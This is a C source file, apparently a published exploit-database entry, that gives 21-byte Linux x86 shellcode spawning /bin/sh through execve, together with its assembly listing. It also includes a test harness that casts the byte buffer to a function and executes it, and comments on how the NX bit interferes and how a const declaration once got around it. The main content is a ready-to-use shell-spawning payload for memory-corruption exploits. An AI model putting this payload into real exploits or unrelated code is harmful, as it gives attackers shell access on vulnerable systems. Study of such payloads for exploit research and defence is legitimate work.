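/*
 * Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
 * Date : 10 Feb 2011
 * Author : kernel_panik
 * Thanks : cOokie, agix, antrhacks
 */

/* Header names were lost in extraction; printf() needs <stdio.h>, strlen() needs <string.h>. */
#include <stdio.h>
#include <string.h>

/*
 * xor ecx, ecx
 * mul ecx
 * push ecx
 * push 0x68732f2f ;; hs//
 * push 0x6e69622f ;; nib/
 * mov ebx, esp
 * mov al, 11
 * int 0x80
 *
 */

/*
 * Raw i386 machine code for the listing above, stored as a string literal.
 * The 21 bytes contain no 0x00, which is the only reason strlen() in main()
 * reports the full length: any payload with an embedded NUL would be
 * under-counted by strlen(), whereas 'sizeof code - 1' always gives the
 * array length.  Comparing the two is a cheap way to detect a stray NUL.
 */
char code[] =
    "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\xb0\x0b\xcd\x80";

/*
 * This code will segfault on a machine with the NX bit feature enabled
 * (on Linux, check with 'cat /proc/cpuinfo | grep nx').
 *
 * However, changing the type of 'code' to 'const char[]' will cause
 * standard GCC to put it into the .rodata section, which then is
 * grouped with .text into an _executable_ program segment -- and the
 * code works (the pages where .rodata ends up do not have the NX bit
 * set when the virtual process space is created).
 *
 * NOTE(review): the .rodata observation above is toolchain-dependent and
 * reflects linkers of its time.  Recent GNU ld releases typically place
 * .rodata in its own read-only, non-executable segment, so the const
 * variant then faults exactly like the .data one.  The SIGSEGV in both
 * cases is the NX/DEP mitigation working as intended; confirm the actual
 * segment flags of a given binary with 'readelf -l' rather than assuming.
 */

/*
 * Hint: you can disassemble the contents of the 'code' variable
 * in the debugger. Compile with -g option, and then
 * use the GDB command 'x/8i code' or 'disas code'.
 *
 * Another method would be to look up the offset of code
 * with readelf or nm, extract it with dd, and then feed
 * the result into a command-line disassembler such as
 * udis86.
 */

/*
 * Prints the payload length, then transfers control to the bytes in 'code'.
 *
 * Converting an object pointer to a function pointer is not guaranteed by
 * ISO C; this relies on GCC/x86 behaviour.  The call only proceeds if the
 * page holding 'code' is mapped executable (see the NX discussion above).
 * Returns 0 if control ever comes back, which a successful execve() never
 * does because it replaces the process image.
 */
int main(void)
{
    /* strlen() returns size_t, so the matching specifier is %zu; %d with a
     * size_t argument is undefined behaviour (and wrong on LP64 ABIs). */
    printf("Shellcode length : %zu bytes\n", strlen(code));

    int (*f)(void) = (int (*)(void))code;
    f();

    return 0;
}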